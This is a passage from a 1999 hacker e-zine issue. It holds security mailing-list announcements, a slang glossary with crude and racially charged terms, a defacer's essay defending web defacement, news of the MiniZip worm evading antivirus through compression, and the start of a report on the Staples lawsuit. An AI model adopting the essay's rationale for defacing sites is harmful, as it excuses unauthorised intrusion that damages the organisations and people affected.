* Incidents' Mailing List. BUGTRAQ has always been about the
discussion of new vulnerabilities. As such I normally don't approve
messages about break-ins, trojans, viruses, etc with the exception
of wide spread cases (Melissa, ADM worm, etc). The other choice
people are usually left with is email CERT but this fails to
communicate this important information to other that may be
potentially affected.
The Incidents mailing list is a lightly moderated mailing list to
facilitate the quick exchange of security incident information.
Topical items include such things as information about rootkits
new trojan horses and viruses, source of attacks and tell-tale
signs of intrusions.
To subscribe email LISTSERV@SECURITYFOCUS.COM with a message body
of:
SUBS INCIDENTS FirstName, LastName
Shortly we'll also be introducing an Information Warfare forum along
with ten other forums over the next two months. These forums will be
built and moderated by people in the community as well as vendors who
are willing to take part in the community building process.
*Note to the vendors here* We have several security vendors who have
agreed to run forums where they can participate in the online communities.
If you would like to take part as well, mail Alfred Huger,
ahuger@securityfocus.com.
On the information resource front you find a large database of
the following:
* Vulnerabilities. We are making accessible a free vulnerability
database. You can search it by vendor, product and keyword. You
will find detailed information on the vulnerability and how to fix it,
as well are links to reference information such as email messages,
advisories and web pages. You can search by vendor, product and
keywords. The database itself is the result of culling through 5
years of BUGTRAQ plus countless other lists and news groups. It's
a shining example of how thorough full disclosure has made a significant
impact on the industry over the last half decade.
* Products. An incredible number of categorized security products
from over two hundred different vendors.
* Services. A large and focused directory of security services offered by
vendors.
* Books, Papers and Articles. A vast number of categorized security
related books, papers and articles. Available to download directly
for our servers when possible.
* Tools. A large array of free security tools. Categorized and
available for download.
* News: A vast number of security news articles going all the way
back to 1995.
* Security Resources: A directory to other security resources on
the net.
As well as many other things such as an event calendar.
For your convenience the home-page can be personalized to display
only information you may be interested in. You can filter by
categories, keywords and operating systems, as well as configure
how much data to display.
I'd like to thank the fine folks at NETSPACE for hosting the
site for as long as they have. Their services have been invaluable.
I hope you find these changes for the best and the new services
useful. I invite you to visit http://www.securityfocus.com/ and
check it out for yourself. If you have any comments or suggestions
please feel free to contact me at this address or at
aleph1@securityfocus.com.
Cheers.
--
Aleph One / aleph1@underground.org
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01
Crypto-Gram
~~~~~~~~~~~
CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.
To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
visit http://www.counterpane.com/unsubform.html. Back issues are available
on http://www.counterpane.com.
CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
Counterpane Systems, the author of "Applied Cryptography," and an inventor
of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of
the International Association for Cryptologic Research, EPIC, and VTW. He
is a frequent writer and lecturer on cryptography.
CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This info directly from their latest ish:
Computer underground Digest Sun 14 Feb, 1999 Volume 11 : Issue 09
ISSN 1004-042X
Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
Archivist: Brendan Kehoe
Poof Reader: Etaion Shrdlu, Jr.
Shadow-Archivists: Dan Carosone / Paul Southworth
Ralph Sims / Jyrki Kuoppala
Ian Dickinson
Cu Digest Homepage: http://www.soci.niu.edu/~cudigest
[ISN] Security list
~~~~~~~~~~~~~~~~~~~
This is a low volume list with lots of informative articles, if I had my
way i'd reproduce them ALL here, well almost all .... ;-) - Ed
UPDATED Sept/99 - Sent in by Androthi, tnx for the update
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
--[ New ISN announcement (New!!)
Sender: ISN Mailing List <ISN@SECURITYFOCUS.COM>
From: mea culpa <jericho@DIMENSIONAL.COM>
Subject: Where has ISN been?
Comments: To: InfoSec News <isn@securityfocus.com>
To: ISN@SECURITYFOCUS.COM
It all starts long ago, on a network far away..
Not really. Several months ago the system that hosted the ISN mail list
was taken offline. Before that occured, I was not able to retrieve the
subscriber list. Because of that, the list has been down for a while. I
opted to wait to get the list back rather than attempt to make everyone
resubscribe.
As you can see from the headers, ISN is now generously being hosted by
Security Focus [www.securityfocus.com]. THey are providing the bandwidth,
machine, and listserv that runs the list now.
Hopefully, this message will find all ISN subscribers, help us weed out
dead addresses, and assure you the list is still here. If you have found
the list to be valuable in the past, please tell friends and associates
about the list. To subscribe, mail listserv@securityfocus.com with
"subscribe isn firstname lastname". To unsubscribe, "unsubscribe isn".
As usual, comments and suggestions are welcome. I apologize for the down
time of the list. Hopefully it won't happen again. ;)
mea_culpa
www.attrition.org
--[ Old ISN welcome message
[Last updated on: Mon Nov 04 0:11:23 1998]
InfoSec News is a privately run, medium traffic list that caters
to distribution of information security news articles. These
articles will come from newspapers, magazines, online resources,
and more.
The subject line will always contain the title of the article, so that
you may quickly and effeciently filter past the articles of no interest.
This list will contain:
o Articles catering to security, hacking, firewalls, new security
encryption, products, public hacks, hoaxes, legislation affecting
these topics and more.
o Information on where to obtain articles in current magazines.
o Security Book reviews and information.
o Security conference/seminar information.
o New security product information.
o And anything else that comes to mind..
Feedback is encouraged. The list maintainers would like to hear what
you think of the list, what could use improving, and which parts
are "right on". Subscribers are also encouraged to submit articles
or URLs. If you submit an article, please send either the URL or
the article in ASCII text. Further, subscribers are encouraged to give
feedback on articles or stories, which may be posted to the list.
Please do NOT:
* subscribe vanity mail forwards to this list
* subscribe from 'free' mail addresses (ie: juno, hotmail)
* enable vacation messages while subscribed to mail lists
* subscribe from any account with a small quota
All of these generate messages to the list owner and make tracking
down dead accounts very difficult. I am currently receiving as many
as fifty returned mails a day. Any of the above are grounds for
being unsubscribed. You are welcome to resubscribe when you address
the issue(s).
Special thanks to the following for continued contribution:
William Knowles, Aleph One, Will Spencer, Jay Dyson,
Nicholas Brawn, Felix von Leitner, Phreak Moi and
other contributers.
ISN Archive: ftp://ftp.repsec.com/pub/text/digests/isn
ISN Archive: http://www.landfield.com/isn
ISN Archive: http://www.jammed.com/Lists/ISN/
ISN is Moderated by 'mea_culpa' <jericho@dimensional.com>. ISN is a
private list. Moderation of topics, member subscription, and
everything else about the list is solely at his discretion.
The ISN membership list is NOT available for sale or disclosure.
ISN is a non-profit list. Sponsors are only donating to cover bandwidth
and server costs.
Win2k Security Advice Mailing List (new added Nov 30th)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
To subscribe:
send "SUBSCRIBE WIN2KSECADVICE anonymous or name" in the message body
to listserv@listserv.ntsecurity.net
Welcome to Win2K Security Advice! Thank you for subscribing. If you have any
questions or comments about the list please feel free to contact the list
moderator, Steve Manzuik, at steve@win2ksecadvice.net.
To see what you've missed recently on the list, or to research an item
of interest, be sure to visit the Web-based archives located at:
http://www.ntsecurity.net/scripts/page_listserv.asp?s=win2ksec
==============
NTSecurity.net brings the security community a brand new (Oct 99) and
much-requested Windows security mailing list. This new moderated mailing list,
Win2KSecAdvice (formerly NTSecAdvice,) is geared towards promoting the open
discussion of Windows-related security issues.
With a firm and unwavering commitment towards timely full disclosure, this
new resource promises to become a great forum for open discussion
regarding security-related bugs, vulnerabilities, potential exploits, virus,
worms, Trojans, and more. Win2KSecAdvice promotes a strong sense of community
and we openly invite all security minded individuals, be they white hat,
gray hat, or black hat, to join the new mailing list.
While Win2KSecAdvice was named in the spirit of Microsoft's impending product
line name change, and meant to reflect the list's security focus both now and
in the long run, it is by no means limited to security topics centered around
Windows 2000. Any security issues that pertain to Windows-based networking are
relevant for discussion, including all Windows operating systems, MS Office,
MS BackOffice, and all related third party applications and hardware.
The scope of Win2KSecAdvice can be summarized very simply: if it's relevant to
a security risk, it's relevant to the list.
The list archives are available on the Web at http://www.ntsecurity.net,
which include a List Charter and FAQ, as well as Web-based searchable list
archives for your research endeavors.
SAVE THIS INFO FOR YOUR REFERENCE:
To post to the list simply send your email to
win2ksecadvice@listserv.ntsecurity.net
To unsubscribe from this list, send UNSUBSCRIBE WIN2KSECADVICE to
listserv@listserv.ntsecurity.net
Regards,
Steve Manzuik, List Moderator
Win2K Security Advice
steve@win2ksecadvice.net
@HWA
00.3 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~
__ ___ ___
\ \ / / |__ ___ __ _ _ __ _____ ____|__ \
\ \ /\ / /| '_ \ / _ \ / _` | '__/ _ \ \ /\ / / _ \/ /
\ V V / | | | | (_) | (_| | | | __/\ V V / __/_|
\_/\_/ |_| |_|\___/ \__,_|_| \___| \_/\_/ \___(_)
Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.
org..........: currently active/programming/IRC+ man in black
sas2@usa.net .............. currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
twisted-pair@home.com......: currently active/programming/IRC+
Foreign Correspondants/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Qubik ............................: United Kingdom
D----Y ...........................: USA/world media
HWA members ......................: World Media
Past Foreign Correspondants (currently inactive or presumed dead)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Sla5h.............................: Croatia
N0Portz ..........................: Australia
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland
Wyze1.............................: South Africa
Please send in your sites for inclusion here if you haven't already
also if you want your emails listed send me a note ... - Ed
Spikeman's site is down as of this writing, if it comes back online it will be
posted here.
http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)
Sla5h's email: smuddo@yahoo.com
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*******************************************************************
:-p
1. We do NOT work for the government in any shape or form.Unless you count paying
taxes ... in which case we work for the gov't in a BIG WAY. :-/
2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
events its a good idea to check out issue #1 at least and possibly also the
Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...
@HWA
00.4 Whats in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Well what does HWA stand for? never mind if you ever find out I may
have to get those hax0rs from 'Hackers' or the Pretorians after you.
In case you couldn't figure it out hax0r is "new skewl" and although
it is laughed at, shunned, or even pidgeon holed with those 'dumb
leet (l33t?) dewds' <see article in issue #4> this is the state
of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
up and comers, i'd highly recommend you get that book. Its almost
like buying a clue. Anyway..on with the show .. - Editorial staff
@HWA
00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
_ ___ ___ _____ _ ___
| | | \ \ / / \ | ___/ \ / _ \
| |_| |\ \ /\ / / _ \ | |_ / _ \| | | |
| _ | \ V V / ___ \ _| _/ ___ \ |_| |
|_| |_| \_/\_/_/ \_(_)_|/_/ \_\__\_\
Also released in issue #3. (revised) check that issue for the faq
it won't be reprinted unless changed in a big way with the exception
of the following excerpt from the FAQ, included to assist first time
readers:
Some of the stuff related to personal useage and use in this zine are
listed below: Some are very useful, others attempt to deny the any possible
attempts at eschewing obfuscation by obsucuring their actual definitions.
@HWA - see EoA ;-)
!= - Mathematical notation "is not equal to" or "does not equal"
ASC(247) "wavey equals" sign means "almost equal" to. If written
an =/= (equals sign with a slash thru it) also means !=, =< is Equal
to or less than and => is equal to or greater than (etc, this aint
fucking grade school, cripes, don't believe I just typed all that..)
AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)
AOL - A great deal of people that got ripped off for net access by a huge
clueless isp with sekurity that you can drive buses through, we're
not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
least they could try leasing one??
*CC - 1 - Credit Card (as in phraud)
2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's
CCC - Chaos Computer Club (Germany)
*CON - Conference, a place hackers crackers and hax0rs among others go to swap
ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
watch videos and seminars, get drunk, listen to speakers, and last but
not least, get drunk.
*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
speak he's the guy that breaks into systems and is often (but by no
means always) a "script kiddie" see pheer
2 . An edible biscuit usually crappy tasting without a nice dip, I like
jalapeno pepper dip or chives sour cream and onion, yum - Ed
Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
ebonics, speaking in a dark tongue ... being ereet, see pheer
EoC - End of Commentary
EoA - End of Article or more commonly @HWA
EoF - End of file
EoD - End of diatribe (AOL'ers: look it up)
FUD - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
usually in general media articles not high brow articles such as ours or other
HNN affiliates ;)
du0d - a small furry animal that scurries over keyboards causing people to type
weird crap on irc, hence when someone says something stupid or off topic
'du0d wtf are you talkin about' may be used.
*HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R
*HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
define, I think it is best defined as pop culture's view on The Hacker ala
movies such as well erhm "Hackers" and The Net etc... usually used by "real"
hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
some coffee?' or can you hax0r some bread on the way to the table please?'
2 - A tool for cutting sheet metal.
HHN - Maybe a bit confusing with HNN but we did spring to life around the same
time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
noun means the hackernews site proper. k? k. ;&
HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html
J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d
MFI/MOI- Missing on/from IRC
NFC - Depends on context: No Further Comment or No Fucking Comment
NFR - Network Flight Recorder (Do a websearch) see 0wn3d
NFW - No fuckin'way
*0WN3D - You are cracked and owned by an elite entity see pheer
*OFCS - Oh for christ's sakes
PHACV - And variations of same <coff>
Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare
Alternates: H - hacking, hacktivist
C - Cracking <software>
C - Cracking <systems hacking>
V - Virus
W - Warfare <cyberwarfare usually as in Jihad>
A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
P - Phreaking, "telephone hacking" PHone fREAKs ...
CT - Cyber Terrorism
*PHEER - This is what you do when an ereet or elite person is in your presence
see 0wn3d
*RTFM - Read the fucking manual - not always applicable since some manuals are
pure shit but if the answer you seek is indeed in the manual then you
should have RTFM you dumb ass.
TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0
TBA - To Be Arranged/To Be Announced also 2ba
TFS - Tough fucking shit.
*w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions
from the underground masses. also "w00ten" <sic>
2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)
*wtf - what the fuck, where the fuck, when the fuck etc ..
*ZEN - The state you reach when you *think* you know everything (but really don't)
usually shortly after reaching the ZEN like state something will break that
you just 'fixed' or tweaked.
@HWA
-=- :. .: -=-
01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
____ _
/ ___|_ __ ___ ___| |_ ___
| | _| '__/ _ \/ _ \ __/ __|
| |_| | | | __/ __/ |_\__ \
\____|_| \___|\___|\__|___/
Thanks to all in the community for their support and interest but i'd
like to see more reader input, help me out here, whats good, what sucks
etc, not that I guarantee i'll take any notice mind you, but send in
your thoughts anyway.
* all the people who sent in cool emails and support
FProphet Pyra TwstdPair _NeM_
D----Y Dicentra vexxation sAs72
Spikeman p0lix Vortexia Wyze1
Pneuma Raven Zym0t1c duro
Repluzer astral BHZ ScrewUp
Qubik gov-boi _Jeezus_ Haze_
thedeuce ytcracker
Folks from #hwa.hax0r,news and #fawkerz, #ninjachat and #sesame
Ken Williams/tattooman ex-of PacketStorm,
& Kevin Mitnick
kewl sites:
+ http://www.hack.co.za NEW
+ http://blacksun.box.sk. NEW
+ http://packetstorm.securify.com/ NEW
+ http://www.securityportal.com/ NEW
+ http://www.securityfocus.com/ NEW
+ http://www.hackcanada.com/
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/
@HWA
01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"What is popular isn't always right, and what is right isn't
always popular..."
- FProphet '99
+++ When was the last time you backed up your important data?
Thanks to myself for providing the info from my wired news feed and others from whatever
sources, also to Spikeman for sending in past entries.... - Ed
@HWA
01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Yeah we have a message board, feel free to use it, remember there are no stupid questions...
well there are but if you ask something really dumb we'll just laugh at ya, lets give the
message board a bit more use eh? i'll be using a real message board when the hwa-iwa.org
domain comes back online (soon) meanwhile the beseen board is still up...
==============================================================================
02.0 From the editor.
~~~~~~~~~~~~~~~~
#include <stdio.h>
#include <thoughts.h>
#include <backup.h>
main()
{
printf ("Read commented source!\n\n");
/*
* Short issue this week, i'm still sick <feh>
* so haven't put as much time as I usually do
* into digging up info and etc, hopefully be
* back to normal next week...
*
*/
printf ("EoF.\n");
}
Congrats, thanks, articles, news submissions and kudos to us at the
main address: hwa@press.usmc.net complaints and all nastygrams and
mai*lbombs can go to /dev/nul nukes, synfloods and papasmurfs to
127.0.0.1, private mail to cruciphux@dok.org
danke.
C*:.
-= start =--= start =--= start =--= start =--= start =--= start =--= start
____ _ _
/ ___|___ _ __ | |_ ___ _ __ | |_
| | / _ \| '_ \| __/ _ \ '_ \| __|
| |__| (_) | | | | || __/ | | | |_
\____\___/|_| |_|\__\___|_| |_|\__|
/ ___|| |_ __ _ _ __| |_
\___ \| __/ _` | '__| __|
___) | || (_| | | | |_
|____/ \__\__,_|_| \__|
-= start =--= start =--= start =--= start =--= start =--= start =--=
03.0 Yes It Is (Worth It)
~~~~~~~~~~~~~~~~~~~~
contributed by ytcracker
Active web page defacer YTCracker has written an
article in response to Brian Martin's article Is It Worth
IT, published by HNN last week. Mr Martin asked if the
recent spate of web page defacements was worth the
trouble it causes the perpetrators. YTCracker has
recently defaced such high profile pages as Bureau of
Land Management National Training Center and the
Defense Contracts Audit Agency. YTCracker now
explains the motivation and says that, Yes, it is worth
it.
Buffer Overflow
http://www.hackernews.com/orig/buffero.html
HNN Cracked Pages Archive - Some of YTCrackers work is displayed here.
http://www.hackernews.com/archive/crackarch.html
"Yes, it is."
A response to Brian Martin's Is it worth it? article.
By YTCracker (phed@felons.org)
This article was written in response to an article written
by Brian Martin concerning web page defacement, its
risks, and its consequences. He asks the eternal question
"Is it worth it?" to those who participate in these kinds of
activities. Many of the individuals I have talked to have
mixed thoughts about the article. Some individuals say it
really taught them something valuable. Some said it
scared them into considering quitting. Others, including
myself, carry a somewhat apathetic attitude toward the
whole thing in general. Allow me to explain.
A few things need to be established about this
defacement culture. One, I believe that this in no way
constitutes as hacking. On any level, no matter how you
look at it, web page defacement is destructive. In some
cases, it can ruin the credibility of a company or a
government agency. Two, I believe that web page
defacement should carry a "message". When I spoke with
Brian earlier, I tried to make it clear that we [as third
person onlookers to a defacement] cannot determine this
message in some cases. To us, "hack0r x 0ens u in 9d9"
probably means nothing at all. To hack0r x, it may have.
However, I personally believe that if hack0r x is going to
break into this page and disrupt their message, his better
be worthwhile. Thirdly, I believe that there is a "whiter"
side to defacement. This side operates within definitive
ethical boundaries and attempts to make web page
cracking as non-malicious as possible.
I do my best to have the ability to define myself under
this ethical side. I back everything up. I leave the
administrator information on how to fix the security hole. I
don't disrupt the flow of information - I leave a link to the
original page in plain sight. While these factors don't
guarantee my immunity, they surely aren't raising any
eyebrows and leading people to contemplate my threat to
national security. I am not concerned with leaving
messages like "fuq da fedz in 9d9 suk0r my nutsaq." That,
frankly, is asking for trouble. It also serves no purpose.
Why do I do it? There are a few key reasons. I am sure
that everyone out there that contributes to this scene
has their own.
First off, I am seventeen [before I go any further, I am
referring to seventeen as "kid", not "a minor and therefore
will receive lesser penalty"]. As a young member of
society oftentimes I find that my voice goes unheard. In a
book titled Rise and Fall of the American Teen by Thomas
Hine [NPR broadcast] , the theory is presented that the
proverbial "teenager" did not exist until the 1930s. Until
that time, teenagers were too busy supporting the family,
getting married, and having children. Nowadays, if I were
to write my senator, correct my teacher, or start a
business, people automatically assume that I am
incapable. This is a stereotype that I have not established
for myself; other teenagers have given me a reputation
unbefitting of who I really am. By defacing a website,
people have to listen. The volume of people that visit the
site as it is defaced combined with the volume of people
that view it mirrored is immense. Therefore, I have
effectively gotten my message out, and people can
choose to listen to it or not.
If this sounds extremely selfish, I agree. The twist comes
in the questions that people ask themselves. For instance,
one of my motivations is enlightening system
administrators. There has been many a case where I have
noticed a vulnerablilty, mailed the admin, and his/her
cockyness resulted in ignoring my warning. Two or three
days later, I see this admin's page on the mirror.
Sometimes, the best way to inform someone is to show
them. Seeing is believing. The point is, if I can get at
least one of the hundred people that see that site,
including the administrator, to realize that security isn't all
its cracked up to be and change their views, I have done
my job. This line of thought is very common in the heads
of most defacement practitioners.
Second, I am a graffiti artist. I throw burners on walls and
trains. I have ran with some infamous crews. I do not
represent the "tagging" aspect [for the uninitiated, the
equivalent of "b0n3r oenz u" on a defacement]. I strongly
feel that graffiti can be very artistic and carry a very
strong message if done correctly. People will pass by your
piece and either love it or hate it. For that moment they
take their mind off of their jobs, their children, their lives
and they contemplate what they are looking at. This is
very much so the purpose of web defacement in my eyes.
Third, I don't care. I can't care. I haven't been raided,
haven't stared down a lawman's gun, and haven't been
investigated for computer crime. If any of these were to
happen to me, I have no doubt in my mind I will see things
in a different light. This ignorance is obviously not very
healthy. I have weighed the consequences and see very
little in favor of me stopping. I will most likely continue to
deface until it gets old, I have nothing else to say, or
simply don't have time. I would argue that ninety percent
of web page defacements fall under this mindset. This is
sad, but true. This is not to say that I or anyone else isn't
aware of the rules. That assumption is far from the truth.
What it means is that we are basically carefree in the
sense that we could be arrested and still feel good about
ourselves. ;)
In a sense, it isn't worth it. There are only a few of us
singlehandedly cracking with good intentions. The rest of
the scene is too busy talking shit to each other or rm
-rfing everything they can that there is a stereotype
affiliated. As aforementioned, stereotypes are the ultimate
backpedal to anything we accomplish. Just as teenagers
are ignored and pigeonholed, everyone who totes a
computer and investigates security will be labeled a
threat.
What does make it worth it? Arguably, the few who carry
on the tradition. PHC and Narcissus - using their
defacements as a political tool. DHC - putting an
interesting poetic twist to their cracks. ULG - for making
BIG statements on BIG sites. Last but not least, v00d00 -
for his cynical views and unique style. There are others,
no doubt, but these guys definately take the cake for
originality and style - they have my respect.
So next time you see my name or anyone else's pop up on
attrition and wonder why we do it, think back to this
article. Is it worth it?
You decide.
YTCracker(phed@felons.org)
(c)1999 YTCracker andseven one nine
@HWA
04.0 ExplorerZip Shrinks, Becomes MiniZip
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Evil Wench
By applying a simple compression scheme (Neolite) to
the well known destructive virus WormExplorer it is
possible to sneak the old worm by antivirus software.
This 'new' version of WormExplorer is being called
MiniZip. The worm uses MAPI-capable e-mail programs
to propagate, such as Microsoft Corp.'s Outlook,
Microsoft Corp.'s Outlook Express and Microsoft Corp.'s
Exchange. At least twenty companies and several
thousand systems have been infected so far. (It is
pretty sad that with todays technology a simple
compression routine is enough to bypass antivirus
technology. Pattern detection is not the answer. Sure
hope the AV companies have something better up their
sleeves.)
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2402114,00.html?chkpt=zdnntop
MSNBC
http://www.msnbc.com/news/341096.asp
Associated Press - via Baltimore Sun
http://www.sunspot.net/cgi-bin/gx.cgi/AppLogic+FTContentServer?section=cover&pagename=story&storyid=1150180206405
MiniZip a nasty, small clone of ExploreZip
New virus compresses ExploreZip code to
evade anti-virus software, bites at least a
dozen companies.
By Jim Kerstetter, PC Week
UPDATED December 1, 1999 9:04 AM PT
They call it, MiniZip.
Virus researchers at Network Associates Inc. (Nasdaq:
NETA), Symantec Corp. (Nasdaq: SYMC) and Trend
Micro Inc. warned Tuesday evening that a new version of
the ExploreZip virus, which wipes out information on a
hard drive, has hit at least 12 companies so far, six of
them high-tech manufacturing companies. Several
thousand PCs are believed to have been hit.
The ExploreZip variant, also called ExploreZip.worm.pak,
is 120KB, about half the size of its predecessor. But
other than its diminutive size, MiniZip acts exactly like
ExploreZip, which wipes out files on hard drives and
can spread via e-mail.
Compression conundrum
MiniZip is so small because the virus's author
compressed the original ExploreZip code. Compressing it
changes the bits, meaning that anti-virus software has
trouble identifying the new virus. MiniZip first appeared
last week, so most anti-virus makers have updated their
software to detect its code. While anti-virus makers
issued notice of the new updates, it appears that many
companies have not updated their anti-virus software,
allowing Tuesday's outbreak.
What to look for
ExploreZip, the "father" of MiniZip, was first reported on
June 11. To propagate, the worm uses MAPI-capable
e-mail programs, such as Microsoft Corp.'s Outlook,
Outlook Express and Exchange.
It e-mails itself out as an attachment with the filename
"zipped_files.exe." The body of the e-mail message looks like
it came from a regular e-mail correspondent and says:
"I received your email and I shall send you a reply ASAP.
Till then, take a look at the attached zipped docs."
Once it's launched, MiniZip launches the original
Worm.ExploreZip routine. It looks for any drives mapped
to the infected computer and spreads to them. It also
looks for unread e-mail and automatically replies to them,
in search of new victims.
"That's why it has spread so rapidly now, but didn't at first,"
said Vincent Weafer, director of the Symantec Antivirus
Research Center. "This is exactly how ExploreZip
spread."
MiniZip may display an error message informing the user
that the file is not a valid archive, according to the
anti-virus companies. The worm copies itself to the
c:\windows\system directory with the file name
"Explore.exe" and then modifies the WIN.INI file so that
the virus launches each time Windows is started.
Associated Press;
Computer virus devouring files
The Associated Press
SAN FRANCISCO (AP) Experts scrambled to warn thousands
of computer users that a familiar and damaging virus has struck
scores of companies and could be slumbering in their e-mail inboxes.
The Mini-Zip virus tore through computers on Tuesday, devouring
files and crippling e-mail systems, anti-virus analysts said. It was
expected to renew its assault today as unsuspecting users logged on.
Dan Schrader, vice president of new technology at Trend Micro in
Cupertino, Calif., said he fielded complaints of significant problems
from four Fortune 500 companies and scores of smaller companies.
Sal Viveros, a marketing manager for Santa Clara-based Network
Associates, which makes anti-virus software, said 20 large
corporations had been affected by Tuesday evening.
The experts refused to release the names of affected companies.
Mini-Zip's parent bug, Worm.Explore.Zip, struck last summer. It
was considered the most destructive virus since the Melissa outbreak
in the spring.
``The last time this virus came along it affected tens of thousands
maybe hundreds of thousands of computers and caused millions
of dollars in damage,'' Schrader said. ``It's malicious and
fast-spreading. We consider this to be high-risk.''
It wasn't clear whether the problem had been reported to the
government-chartered CERT Coordination Center formerly the
Computer Emergency Response Team at Carnegie Mellon
University in Pittsburgh. There were no warnings on its Web site
early today.
Anti-virus experts said the bug gets loose from an infected system as
a seemingly friendly reply to a clean e-mail sent via the Microsoft
Outlook, Outlook Express or Exchange browsers.
The virus intercepts the original message and automatically sends
itself as a response even changing the subject line from, for
example, ``Work Meeting'' to ``Re: Work Meeting.''
The body of the message reads: ``Hi (recipient's name)! I received
your e-mail and I shall send you an e-mail ASAP. Till then, take a
look at the attached zipped docs. bye.''
The e-mail contains an attachment called ``zippedfiles.exe.'' If a
user double-clicks on the attachment, the virus is set loose in the new
victim's system.
It then destroys a series of files in a computer's hard drive by
replacing them with empty files.
Anti-virus experts cautioned users against opening e-mails if they do
not know the sender or why they were sent. They said the virus
could be fought with updated anti-virus software.
Originally published on 12/01/1999
@HWA
05.0 Staples Files Suit Against Unknown Defacer
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Weld Pond
Staples Inc. has filed a lawsuit in US District Court in
Boston charging that "John Doe," an unidentified cyber
intruder, illegally accessed the company's Web site and
damaged the company by stealing e-commerce
business. The defacement that occurred on October
9th, featured advertisements for products at Home
Depot. Staples hope to identify the intruder shortly.
(How do you sue an unknown person?)
Boston Globe
http://www.globe.com/dailyglobe2/334/business/Staples_files_suit_against_Web_hacker+.shtml
Associated Press
http://library.northernlight.com/EB19991130960000057.html?cb=0&dx=1006&sc=0#doc
Staples files suit against Web
hacker
By Shelley Murphy, Globe Staff, 11/30/99
hopping on line may be the best way to avoid holiday crowds, but
customers visiting Staples's Web site one day last month encountered a
unique problem when they unwittingly found themselves in a competitor's
store.
A hacker broke into the Framingham office-supply retailer's Internet site,
www.staples.com, on Oct. 9 and posted advertisements for one of the
company's major competitors, Office Depot.
Shoppers clicking on Office Depot products were linked immediately to the
home page of Staples's major competitor, which is based in Delray Beach,
Fla.
Officials at Staples Inc. filed a lawsuit in US District Court in Boston
yesterday charging that ''John Doe,'' the unidentified hacker, illegally accessed
the company's Web site and damaged the company by stealing e-commerce
business.
The suit contends that the hacker is believed to live in or near Massachusetts
and that the company expects to identify him shortly.
''We consider it highly unlikely that...our competitors were involved in any
way,'' said Shannon Lapierre, public relations manager of Staples, speculating
that the changes to the Web site may have been a prank.
But Staples, which just announced third-quarter Internet sales revenue of $24
million, is taking the Web-site intrusion seriously and is determined to identify
the culprit and report him to federal authorities, Lapierre said.
Meanwhile, federal authorities have been on the lookout for Internet fraud.
Federal law prohibits unauthorized access to a computer and calls for as
